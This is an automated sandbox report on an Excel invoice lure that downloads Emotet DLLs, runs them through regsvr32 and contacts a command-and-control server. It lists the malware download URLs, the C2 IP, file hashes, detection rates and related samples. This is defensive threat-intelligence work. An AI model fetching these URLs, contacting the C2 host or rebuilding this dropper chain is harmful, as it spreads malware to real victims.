                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 632061 Sample: RechnungsDetails.xls Startdate: 23/05/2022 Architecture: WINDOWS Score: 100 54 Multi AV Scanner detection for domain / URL 2->54 56 Antivirus detection for URL or domain 2->56 58 Multi AV Scanner detection for dropped file 2->58 60 10 other signatures 2->60 7 EXCEL.EXE 7 24 2->7         started        12 svchost.exe 2->12         started        process3 dnsIp4 46 jr-software-web.net 138.219.41.210, 49178, 80 DattateccomAR Argentina 7->46 48 masyuk.com 128.199.252.32, 80 DIGITALOCEAN-ASNUS United Kingdom 7->48 50 3 other IPs or domains 7->50 32 C:\Users\user\uxevr4.ocx, PE32+ 7->32 dropped 34 C:\Users\user\uxevr2.ocx, PE32+ 7->34 dropped 36 C:\Users\user\uxevr1.ocx, PE32+ 7->36 dropped 38 4 other malicious files 7->38 dropped 64 Document exploit detected (creates forbidden files) 7->64 66 Document exploit detected (UrlDownloadToFile) 7->66 14 regsvr32.exe 2 7->14         started        18 regsvr32.exe 2 7->18         started        20 regsvr32.exe 2 7->20         started        22 regsvr32.exe 7->22         started        file5 signatures6 process7 file8 40 C:\Windows\System32\...\xhDhNsFFy.dll (copy), PE32+ 14->40 dropped 68 Hides that the sample has been downloaded from the Internet (zone.identifier) 14->68 24 regsvr32.exe 14->24         started        42 C:\Windows\System32\FIdWcBbehaviorgraphulPp.dll (copy), PE32+ 18->42 dropped 27 regsvr32.exe 2 18->27         started        44 C:\Windows\...\oACuhBcYqGjSrI.dll (copy), PE32+ 20->44 dropped 30 regsvr32.exe 20->30         started        signatures9 process10 dnsIp11 62 System process connects to network (likely due to code injection or exploit) 24->62 52 173.82.82.196, 49175, 49179, 8080 MULTA-ASN1US United States 27->52 signatures12

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      RechnungsDetails.xls42%VirustotalBrowse
                      RechnungsDetails.xls37%ReversingLabsDocument-Excel.Trojan.Abracadabra
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\F3DOS06hLF1rUq3s6XOB[1].dll100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\CPZby9k8xhW2TaPgwsAagxTpGuhIkFrK[1].dll100%Joe Sandbox ML
                      C:\Users\user\uxevr1.ocx100%Joe Sandbox ML
                      C:\Users\user\uxevr4.ocx100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\LjSKxP[1].dll100%Joe Sandbox ML
                      C:\Users\user\uxevr2.ocx100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\LjSKxP[1].dll26%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\LjSKxP[1].dll65%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\CPZby9k8xhW2TaPgwsAagxTpGuhIkFrK[1].dll39%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\F3DOS06hLF1rUq3s6XOB[1].dll37%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\F3DOS06hLF1rUq3s6XOB[1].dll62%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\uxevr1.ocx39%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\uxevr2.ocx37%MetadefenderBrowse
                      C:\Users\user\uxevr2.ocx62%ReversingLabsWin64.Trojan.Emotet
                      C:\Users\user\uxevr4.ocx26%MetadefenderBrowse
                      C:\Users\user\uxevr4.ocx65%ReversingLabsWin64.Trojan.Emotet
                      C:\Windows\System32\AQbqR\xhDhNsFFy.dll (copy)26%MetadefenderBrowse
                      C:\Windows\System32\AQbqR\xhDhNsFFy.dll (copy)65%ReversingLabsWin64.Trojan.Emotet
                      C:\Windows\System32\FIdWcB\GulPp.dll (copy)39%ReversingLabsWin64.Trojan.Emotet
                      C:\Windows\System32\IWNForDwCavadlTU\oACuhBcYqGjSrI.dll (copy)37%MetadefenderBrowse
                      C:\Windows\System32\IWNForDwCavadlTU\oACuhBcYqGjSrI.dll (copy)62%ReversingLabsWin64.Trojan.Emotet
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      elamurray.com4%VirustotalBrowse
                      jr-software-web.net11%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      https://173.82.82.196:8080/100%URL Reputationmalware
                      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                      https://www.melisetotoaksesuar.com/catalog/controller/account/dqfKI/100%Avira URL Cloudmalware
                      http://jr-software-web.net/aaabackupsqldb/11hYk3bHJ/100%Avira URL Cloudmalware
                      http://ocsp.entrust.net030%URL Reputationsafe
                      http://elamurray.com/athletics-carnival-2018/3UTZYr9D9f/100%Avira URL Cloudmalware
                      https://173.82.82.196/100%URL Reputationmalware
                      https://173.82.82.196/(100%Avira URL Cloudmalware
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                      https://173.82.82.196/F100%Avira URL Cloudmalware
                      https://173.82.82.196:8080/J100%Avira URL Cloudmalware
                      http://ocsp.entrust.net0D0%URL Reputationsafe
                      https://173.82.82.196:8080/N100%Avira URL Cloudmalware
                      https://173.82.82.196:8080/0100%Avira URL Cloudmalware
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      elamurray.com
                      66.84.31.11
                      truefalseunknown
                      jr-software-web.net
                      138.219.41.210
                      truetrueunknown
                      masyuk.com
                      128.199.252.32
                      truefalse
                        unknown
                        melisetotoaksesuar.com
                        212.98.224.29
                        truefalse
                          unknown
                          www.melisetotoaksesuar.com
                          unknown
                          unknownfalse
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            https://www.melisetotoaksesuar.com/catalog/controller/account/dqfKI/true
                            • Avira URL Cloud: malware
                            unknown
                            http://jr-software-web.net/aaabackupsqldb/11hYk3bHJ/true
                            • Avira URL Cloud: malware
                            unknown
                            http://elamurray.com/athletics-carnival-2018/3UTZYr9D9f/true
                            • Avira URL Cloud: malware
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://173.82.82.196:8080/regsvr32.exe, 0000000A.00000002.1346856762.0000000002A90000.00000004.00000020.00020000.00000000.sdmptrue
                            • URL Reputation: malware
                            unknown
                            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0regsvr32.exe, 00000004.00000002.1346901420.0000000002688000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346675258.00000000003C5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346897623.0000000002ABD000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://crl.entrust.net/server1.crl0regsvr32.exe, 00000004.00000002.1346901420.0000000002688000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346675258.00000000003C5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346897623.0000000002ABD000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://ocsp.entrust.net03regsvr32.exe, 00000004.00000002.1346901420.0000000002688000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346675258.00000000003C5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346897623.0000000002ABD000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://173.82.82.196/regsvr32.exe, 0000000A.00000002.1346856762.0000000002A90000.00000004.00000020.00020000.00000000.sdmptrue
                              • URL Reputation: malware
                              unknown
                              https://173.82.82.196/(regsvr32.exe, 0000000A.00000002.1346856762.0000000002A90000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 00000004.00000002.1346901420.0000000002688000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346897623.0000000002ABD000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.diginotar.nl/cps/pkioverheid0regsvr32.exe, 00000004.00000002.1346901420.0000000002688000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346675258.00000000003C5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346897623.0000000002ABD000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://173.82.82.196/Fregsvr32.exe, 00000004.00000003.995694661.00000000003F6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1346693049.00000000003F6000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              https://173.82.82.196/fregsvr32.exe, 00000004.00000003.995694661.00000000003F6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1346693049.00000000003F6000.00000004.00000020.00020000.00000000.sdmptrue
                                unknown
                                https://173.82.82.196:8080/Jregsvr32.exe, 00000004.00000003.995694661.00000000003F6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1346693049.00000000003F6000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                http://ocsp.entrust.net0Dregsvr32.exe, 00000004.00000002.1346901420.0000000002688000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346897623.0000000002ABD000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://173.82.82.196:8080/Nregsvr32.exe, 00000004.00000003.995694661.00000000003F6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1346693049.00000000003F6000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                unknown
                                https://secure.comodo.com/CPS0regsvr32.exe, 00000004.00000002.1346901420.0000000002688000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346675258.00000000003C5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346897623.0000000002ABD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346856762.0000000002A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://crl.entrust.net/2048ca.crl0regsvr32.exe, 00000004.00000002.1346901420.0000000002688000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000A.00000002.1346897623.0000000002ABD000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://173.82.82.196:8080/0regsvr32.exe, 0000000A.00000002.1346856762.0000000002A90000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    128.199.252.32
                                    masyuk.comUnited Kingdom
                                    14061DIGITALOCEAN-ASNUSfalse
                                    173.82.82.196
                                    unknownUnited States
                                    35916MULTA-ASN1UStrue
                                    138.219.41.210
                                    jr-software-web.netArgentina
                                    27823DattateccomARtrue
                                    212.98.224.29
                                    melisetotoaksesuar.comTurkey
                                    15924BORUSANTELEKOM-ASTRfalse
                                    66.84.31.11
                                    elamurray.comUnited States
                                    17054AS17054USfalse
                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                    Analysis ID:632061
                                    Start date and time: 23/05/202208:58:562022-05-23 08:58:56 +02:00
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 10m 49s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:RechnungsDetails.xls
                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                    Number of analysed new started processes analysed:14
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.expl.evad.winXLS@16/15@4/5
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HDC Information:
                                    • Successful, ratio: 51.4% (good quality ratio 33.7%)
                                    • Quality average: 43.7%
                                    • Quality standard deviation: 39.5%
                                    HCA Information:
                                    • Successful, ratio: 96%
                                    • Number of executed functions: 43
                                    • Number of non-executed functions: 246
                                    Cookbook Comments:
                                    • Found application associated with file extension: .xls
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                    • Attach to Office via COM
                                    • Scroll down
                                    • Close Viewer
                                    • Exclude process from analysis (whitelisted): dllhost.exe
                                    • Excluded IPs from analysis (whitelisted): 173.222.108.226, 173.222.108.210
                                    • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    TimeTypeDescription
                                    08:59:28API Interceptor2004x Sleep call for process: regsvr32.exe modified
                                    09:00:02API Interceptor229x Sleep call for process: svchost.exe modified
                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    128.199.252.32Address Changed.xlsGet hashmaliciousBrowse
                                    • masyuk.com/581voyze/MlX/
                                    Form - May 17, 2022.lnkGet hashmaliciousBrowse
                                    • masyuk.com/581voyze/CS/
                                    PHG478286648WZ.lnkGet hashmaliciousBrowse
                                    • masyuk.com/581voyze/CS/
                                    Fattura numero 75325 del 17.05.lnkGet hashmaliciousBrowse
                                    • masyuk.com/581voyze/CS/
                                    173.82.82.196Rechnungskorrektur 2022.20.05_1305.lnkGet hashmaliciousBrowse
                                      Rechnungskorrektur.xlsGet hashmaliciousBrowse
                                        RechnungsDetails 2022.20.05_1044.lnkGet hashmaliciousBrowse
                                          Rechnung 2022.20.05_1440.xlsGet hashmaliciousBrowse
                                            melimar.com.xlsGet hashmaliciousBrowse
                                              AGK-010522 MJEY-210522.xlsGet hashmaliciousBrowse
                                                qJhkILqiEA.dllGet hashmaliciousBrowse
                                                  ySv9jlPYxN.dllGet hashmaliciousBrowse
                                                    uDAHAlLDYG.dllGet hashmaliciousBrowse
                                                      qJhkILqiEA.dllGet hashmaliciousBrowse
                                                        kUXfb4ZQK4.dllGet hashmaliciousBrowse
                                                          ySv9jlPYxN.dllGet hashmaliciousBrowse
                                                            uDAHAlLDYG.dllGet hashmaliciousBrowse
                                                              KzqzJLGI6e.dllGet hashmaliciousBrowse
                                                                EVS7gcLnud.dllGet hashmaliciousBrowse
                                                                  kUXfb4ZQK4.dllGet hashmaliciousBrowse
                                                                    o2PJRbV77k.dllGet hashmaliciousBrowse
                                                                      EVS7gcLnud.dllGet hashmaliciousBrowse
                                                                        KzqzJLGI6e.dllGet hashmaliciousBrowse
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                          elamurray.comRechnungskorrektur.xlsGet hashmaliciousBrowse
                                                                          • 66.84.31.11
                                                                          Rechnung 2022.20.05_1440.xlsGet hashmaliciousBrowse
                                                                          • 66.84.31.11
                                                                          Address Changed.xlsGet hashmaliciousBrowse
                                                                          • 66.84.31.11
                                                                          masyuk.comRechnungskorrektur.xlsGet hashmaliciousBrowse
                                                                          • 128.199.252.32
                                                                          Rechnung 2022.20.05_1440.xlsGet hashmaliciousBrowse
                                                                          • 128.199.252.32
                                                                          Address Changed.xlsGet hashmaliciousBrowse
                                                                          • 128.199.252.32
                                                                          Form - May 17, 2022.lnkGet hashmaliciousBrowse
                                                                          • 128.199.252.32
                                                                          PHG478286648WZ.lnkGet hashmaliciousBrowse
                                                                          • 128.199.252.32
                                                                          Fattura numero 75325 del 17.05.lnkGet hashmaliciousBrowse
                                                                          • 128.199.252.32
                                                                          jr-software-web.netRechnungskorrektur.xlsGet hashmaliciousBrowse
                                                                          • 138.219.41.210
                                                                          Rechnung 2022.20.05_1440.xlsGet hashmaliciousBrowse
                                                                          • 138.219.41.210
                                                                          Address Changed.xlsGet hashmaliciousBrowse
                                                                          • 138.219.41.210
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                          DIGITALOCEAN-ASNUSRechnungskorrektur.xlsGet hashmaliciousBrowse
                                                                          • 128.199.252.32
                                                                          Rechnung 2022.20.05_1440.xlsGet hashmaliciousBrowse
                                                                          • 128.199.252.32
                                                                          Swift copy.exeGet hashmaliciousBrowse
                                                                          • 206.189.39.129
                                                                          melimar.com.xlsGet hashmaliciousBrowse
                                                                          • 159.203.19.2
                                                                          AGK-010522 MJEY-210522.xlsGet hashmaliciousBrowse
                                                                          • 159.203.19.2
                                                                          3vYbe1bYFd.dllGet hashmaliciousBrowse
                                                                          • 165.22.73.229
                                                                          3vYbe1bYFd.dllGet hashmaliciousBrowse
                                                                          • 165.22.73.229
                                                                          meerkat.arm7-20220522-2050Get hashmaliciousBrowse
                                                                          • 5.101.107.84
                                                                          nZNmWqwnpr.dllGet hashmaliciousBrowse
                                                                          • 165.22.73.229
                                                                          W3XqCWvDWC.dllGet hashmaliciousBrowse
                                                                          • 165.22.73.229
                                                                          JtJ50Swtfo.dllGet hashmaliciousBrowse
                                                                          • 165.22.73.229
                                                                          nZNmWqwnpr.dllGet hashmaliciousBrowse
                                                                          • 165.22.73.229
                                                                          W3XqCWvDWC.dllGet hashmaliciousBrowse
                                                                          • 165.22.73.229
                                                                          JtJ50Swtfo.dllGet hashmaliciousBrowse
                                                                          • 165.22.73.229
                                                                          VUzZGNPCim.dllGet hashmaliciousBrowse
                                                                          • 165.22.73.229
                                                                          ZWc3yi399O.dllGet hashmaliciousBrowse
                                                                          • 165.22.73.229
                                                                          QK2fMdqsA1.dllGet hashmaliciousBrowse
                                                                          • 165.22.73.229
                                                                          CVVgbFa04U.dllGet hashmaliciousBrowse
                                                                          • 165.22.73.229
                                                                          HN8n4TeTGO.dllGet hashmaliciousBrowse
                                                                          • 165.22.73.229
                                                                          VUzZGNPCim.dllGet hashmaliciousBrowse
                                                                          • 165.22.73.229
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                          7dcce5b76c8b17472d024758970a406bRechnungskorrektur.xlsGet hashmaliciousBrowse
                                                                          • 212.98.224.29
                                                                          Rechnung 2022.20.05_1440.xlsGet hashmaliciousBrowse
                                                                          • 212.98.224.29
                                                                          melimar.com.xlsGet hashmaliciousBrowse
                                                                          • 212.98.224.29
                                                                          AGK-010522 MJEY-210522.xlsGet hashmaliciousBrowse
                                                                          • 212.98.224.29
                                                                          report 340.xlsGet hashmaliciousBrowse
                                                                          • 212.98.224.29
                                                                          info_1.xlsGet hashmaliciousBrowse
                                                                          • 212.98.224.29
                                                                          Facture_09.02.2022_V2.xlsbGet hashmaliciousBrowse
                                                                          • 212.98.224.29
                                                                          Scan 69.xlsGet hashmaliciousBrowse
                                                                          • 212.98.224.29
                                                                          Address Changed.xlsGet hashmaliciousBrowse
                                                                          • 212.98.224.29
                                                                          10082376542717622006.xlsGet hashmaliciousBrowse
                                                                          • 212.98.224.29
                                                                          6691113204648532361.xlsGet hashmaliciousBrowse
                                                                          • 212.98.224.29
                                                                          E318709655.xlsGet hashmaliciousBrowse
                                                                          • 212.98.224.29
                                                                          OGgZVa2y3B.xlsGet hashmaliciousBrowse
                                                                          • 212.98.224.29
                                                                          E282497021.xlsGet hashmaliciousBrowse
                                                                          • 212.98.224.29
                                                                          E2992512590.xlsGet hashmaliciousBrowse
                                                                          • 212.98.224.29
                                                                          L1877777548.xlsGet hashmaliciousBrowse
                                                                          • 212.98.224.29
                                                                          SecuriteInfo.com.Exploit.Siggen3.32399.24702.xlsGet hashmaliciousBrowse
                                                                          • 212.98.224.29
                                                                          SecuriteInfo.com.Exploit.Siggen3.32401.11843.xlsGet hashmaliciousBrowse
                                                                          • 212.98.224.29
                                                                          SecuriteInfo.com.Exploit.Siggen3.32389.1290.xlsGet hashmaliciousBrowse
                                                                          • 212.98.224.29
                                                                          Contract - May 18, 2022 from Reliancecorp.xlsGet hashmaliciousBrowse
                                                                          • 212.98.224.29
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\CPZby9k8xhW2TaPgwsAagxTpGuhIkFrK[1].dllRechnungskorrektur.xlsGet hashmaliciousBrowse
                                                                            Rechnung 2022.20.05_1440.xlsGet hashmaliciousBrowse
                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\F3DOS06hLF1rUq3s6XOB[1].dllRechnungskorrektur.xlsGet hashmaliciousBrowse
                                                                                Rechnung 2022.20.05_1440.xlsGet hashmaliciousBrowse
                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\LjSKxP[1].dllRechnungskorrektur.xlsGet hashmaliciousBrowse
                                                                                    Rechnung 2022.20.05_1440.xlsGet hashmaliciousBrowse
                                                                                      Process:C:\Windows\System32\regsvr32.exe
                                                                                      File Type:Microsoft Cabinet archive data, 61480 bytes, 1 file
                                                                                      Category:dropped
                                                                                      Size (bytes):61480
                                                                                      Entropy (8bit):7.9951219482618905
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:kmu7iDG/SCACih0/8uIGantJdjFpTE8lTeNjiXKGgUN:CeGf5gKsG4vdjFpjlYeX9gUN
                                                                                      MD5:B9F21D8DB36E88831E5352BB82C438B3
                                                                                      SHA1:4A3C330954F9F65A2F5FD7E55800E46CE228A3E2
                                                                                      SHA-256:998E0209690A48ED33B79AF30FC13851E3E3416BED97E3679B6030C10CAB361E
                                                                                      SHA-512:D4A2AC7C14227FBAF8B532398FB69053F0A0D913273F6917027C8CADBBA80113FDBEC20C2A7EB31B7BB57C99F9FDECCF8576BE5F39346D8B564FC72FB1699476
                                                                                      Malicious:false
                                                                                      Preview:MSCF....(.......,...................I........y.........Tbr .authroot.stl..$..4..CK..<Tk...c_.d....A.K.....Y.f....!.))$7*I.....e..eKT..k....n.3.......S..9.s.....3H.Mh......qV.=M6.=.4.F.....V:F..]......B`....Q...c"U.0.n....J.....4.....i7s..:.27....._...+).lE..he.4|.?,...h....7..PA..b.,. .....#1+..o...g.....2n1m...=.......Dp.;..f..ljX.Dx..r<'.1RI3B0<w.D.z..)D|..8<..c+..'XH..K,.Y..d.j.<.A.......l_lVb[w..rDp...'.....nL....!G.F....f.fX..r.. ?.....v(...L..<.\.Z..g;.>.0v...P ......|...A..(..x...T0.`g...c..7.U?...9.p..a..&..9......sV..l0..D..fhi..h.F....q...y.....Mq].4..Z.....={L....AS..9.....:.:.........+..P.N....EAQ.V. sr.....y.B.`.Efe..8../....$...y-.q.J.......nP...2.Q8...O........M.@\.>=X....V..z.4.=.@...ws.N.M3.S.c?.....C4]?..\.K.9......^...CU......O....X.`........._.gU...*..V.{V6..m..D.-|.Q.t.7.....9.~....[...I.<e...~$..>......s.I.S....~1..IV.2Ri:..]R!8...q...l.X.%.)@......2.gb,t...}..;...@.Z..<q..y..:...e3..cY.we.$....z..| .#.......I...
                                                                                      Process:C:\Windows\System32\regsvr32.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):330
                                                                                      Entropy (8bit):3.115090845510302
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:kKXqoJN+SkQlPlEGYRMY9z+4KlDA3RUesJ21:fEkPlE99SNxAhUesE1
                                                                                      MD5:01DCC6674DA3F89459A924A435B41CCC
                                                                                      SHA1:9D3C9D220B0BD1224DB3BECC7FE84D7D0B9850F5
                                                                                      SHA-256:C7FE40BE3E008792FA454BD2551FEE2647C6396DED44BA39692D1ACD2FE67E39
                                                                                      SHA-512:768D8609A273E8C1490E5FD1119A6ECD2E094962213F5B1D2A1DEC8FD17E762C68039E6A864B3E3388453046632AE1F790F02F77D83E0294212DE335A1FCE94A
                                                                                      Malicious:false
                                                                                      Preview:p...... ........Ws..n..(....................................................... ........3k/"[......(...........(...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.3.3.6.b.2.f.2.2.5.b.d.8.1.:.0."...
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                      Category:downloaded
                                                                                      Size (bytes):365056
                                                                                      Entropy (8bit):7.158103111942775
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTD0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TeRIvgMSS3AyUrhYu3j
                                                                                      MD5:DC718A4E9DA03BBC0673313CD6D7715C
                                                                                      SHA1:C500D8F78D3EFFA575F7AD020513B2CDD96653DC
                                                                                      SHA-256:67C21491D013E6DBE6E123530F6686010163E75EF3DF41CEEBF7601C78692434
                                                                                      SHA-512:7053E6BCF2E6F8DDC51E4152993E86DFBA83E6DD0EE3476F77CD7DCB916ADAB611730DF1B5E936BE476C73DE5F2241BFF96CCE53697DE4693DBE943457785D0C
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: Metadefender, Detection: 26%, Browse
                                                                                      • Antivirus: ReversingLabs, Detection: 65%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: Rechnungskorrektur.xls, Detection: malicious, Browse
                                                                                      • Filename: Rechnung 2022.20.05_1440.xls, Detection: malicious, Browse
                                                                                      IE Cache URL:http://jr-software-web.net/aaabackupsqldb/11hYk3bHJ/
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):365056
                                                                                      Entropy (8bit):7.158100775230176
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTM0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3T1RIvgMSS3AyUrhYu3j
                                                                                      MD5:3E28EC446EC996E82C1330164271ACDD
                                                                                      SHA1:61FD8CCDFFDC93C3FE10D926524701E926499B8E
                                                                                      SHA-256:8975189B8CB95CA5DC8EDAE1AC48C816A065467355B5C8678C6D9C0323C8F13B
                                                                                      SHA-512:19864DF1260BF4DCCF22B84ACCB50D09C27D499582A2166F7B419B7FD5D16B2C31DF3E199009A449E38BAAAC853EDD8B3F60F0330176E316F032C645D6840090
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 39%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: Rechnungskorrektur.xls, Detection: malicious, Browse
                                                                                      • Filename: Rechnung 2022.20.05_1440.xls, Detection: malicious, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                      Category:downloaded
                                                                                      Size (bytes):376320
                                                                                      Entropy (8bit):7.110062137113599
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:3LAmffHSqTgEIUvQbPR7PzWtM8aoAVXywf1Ey3B86v/MUxo1/BwNPAtZZr:7AmffHcjSO7lrfyyR8Gm1/Sex
